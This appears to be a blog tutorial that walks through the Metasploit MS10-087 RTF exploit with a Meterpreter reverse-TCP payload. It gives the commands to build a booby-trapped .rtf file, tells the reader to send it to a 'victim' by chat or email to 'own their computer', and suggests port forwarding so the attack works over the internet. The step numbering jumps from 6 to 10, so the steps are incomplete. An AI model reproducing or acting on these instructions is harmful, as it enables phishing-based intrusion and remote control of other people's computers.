1. Turn on your Kali Linux machine
2. Open the terminal and type in msfconsole and press Enter. Wait for Metasploit to load (it could take a while)
3. Once Metasploit has been loaded completely. Type in the command below;
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
4. Now we need to set up the meterpreter by typing in the following command
set payload windows/meterpreter/reverse_tcp
5. This step is optional but recommended because it shows you the options you can use for this exploit. It will also show you the file name you generated, LHOST, LPORT etc. You can view the option by typing in show options and press Enter
6. Now you can generate the .rtf file by typing in the command set FILENAME filename.rtf and press Enter, where filename.rtf is the name of the file.
set LHOST 192.168.30.132 and press Enter
10. Now you are ready to exploit. Simply type in exploit and press Enter
Just type in cd /root/.msf4/local and press Enter to move to the directory containing the exploit, then execute the following command;
cp /root/.msf4/local/filename.rtf /root/Desktop
In my case, it is cp /root/.msf4/local/greeting.rtf /root/Desktop
You should now see a copy of the exploit on your Kali Desktop. Upload this file to a file hosting service, generate a link and send it to the victim via chat or email. Once the victim downloaded the file and open it. BOOM you own their computer. From here you can navigate their computer using the Metasploit console. Just type in shell and press Enter to drop into a shell.
Note that what I just showed you only works on LAN and not WAN or the Internet. In order for this to work over the internet, you will need to go into your router and configure port forwarding. To learn more about port forwarding click here
0 comments:
Post a Comment